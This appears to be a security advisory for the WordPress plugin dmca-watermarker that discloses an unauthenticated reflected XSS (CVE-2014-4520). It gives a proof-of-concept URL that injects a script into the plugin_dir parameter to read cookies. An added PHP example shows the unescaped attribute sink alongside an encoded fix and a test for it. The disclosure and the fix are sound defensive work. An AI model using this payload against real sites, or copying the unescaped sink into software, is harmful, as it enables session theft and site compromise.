wp-plugin : dmca-watermarker

Plugin Details
Plugin Name: wp-plugin : dmca-watermarker
Affected Version : 1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

PoC: http://locahost/wordpress/wp-content/wp-plugs/dmcawatermarker/phprack.php?plugin_dir=plugin_dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : plugin_dir

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=904684%40dmca-watermarker&old=549072%40dmca-watermarker
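The PoC above works because the decoded plugin_dir value begins with '> , which closes a single-quoted attribute and the tag it sits in before the injected markup is echoed back. The following is an added illustration, not the plugin's own code: it assumes (hypothetically) that phprack.php reflects $_GET['plugin_dir'] into an HTML attribute, and shows that sink next to its attribute-encoded form.

```php
<?php
// Added example, not code from the dmca-watermarker plugin. The sink shape
// (an HTML attribute filled straight from the query string) is an assumption
// drawn from the shape of the PoC payload.

// Vulnerable pattern: raw query value concatenated into a single-quoted
// attribute. A value such as  plugin_dir'><script>...  ends the attribute and
// the tag, so the rest is rendered as markup.
function render_plugin_dir_unsafe(string $plugin_dir): string {
    return "<input type='hidden' name='plugin_dir' value='" . $plugin_dir . "'>";
}

// Hardened form: encode for the attribute context before output. Inside a
// WordPress plugin esc_attr() is the idiomatic call; htmlspecialchars() with
// ENT_QUOTES is used here so the script runs stand-alone. Quotes and angle
// brackets become entities, so the value can no longer leave the attribute.
function render_plugin_dir_safe(string $plugin_dir): string {
    $encoded = htmlspecialchars($plugin_dir, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='hidden' name='plugin_dir' value='" . $encoded . "'>";
}

// Regression check usable in a plugin's test suite: the encoded output must
// not contain a literal "'>" or "<script" anywhere, for any input.
function attribute_stays_closed(string $rendered): bool {
    // Exactly one "'>" may appear: the one that legitimately closes the tag.
    return substr_count($rendered, "'>") === 1
        && stripos($rendered, '<script') === false;
}

// Constructed input: the url-decoded form of the advisory's PoC parameter.
$poc = urldecode('plugin_dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E');

$unsafe = render_plugin_dir_unsafe($poc);
$safe   = render_plugin_dir_safe($poc);

echo "unsafe output keeps attribute closed: "
    . (attribute_stays_closed($unsafe) ? 'yes' : 'no') . PHP_EOL;   // no
echo "safe output keeps attribute closed:   "
    . (attribute_stays_closed($safe) ? 'yes' : 'no') . PHP_EOL;     // yes
```

Run with `php example.php`; the unsafe renderer fails the check for the PoC value while the encoded renderer passes it for that and any other input.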


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : 2014-05-28
CVE Number : CVE-2014-4520
Plugin Description :
The DMCA.com WaterMarker plugin for WordPress allows you to easily integrate DMCA.com's WaterMarking for a specific folder into your WordPress site. For more information about the features & benefits of the service visit [DMCA.com](http://www.dmca.com/protection.aspx?ad=wpo) [» Register](http://www.dmca.com/Badges.aspx?ad=wpo) | [» Learn More](http://www.dmca.com/Protection.aspx?ad=wpo) | [» Upgrade to Pro](https://www.dmca.com/Toolkit/signup.aspx?lnk=wps&mpi=DMCA%20Toolkit) Once installed and activated, you can use the DMCA WaterMarker page in your Dashboard's Settings Menu to specify how your choice of badge should be displayed in posts and pages. You can also choose to display your badge site-wide using the DMCA Badge Widget. You can use the badges for free, but we suggest that you sign up for an account at dmca.com in order to receive the full benefit of the certified badges.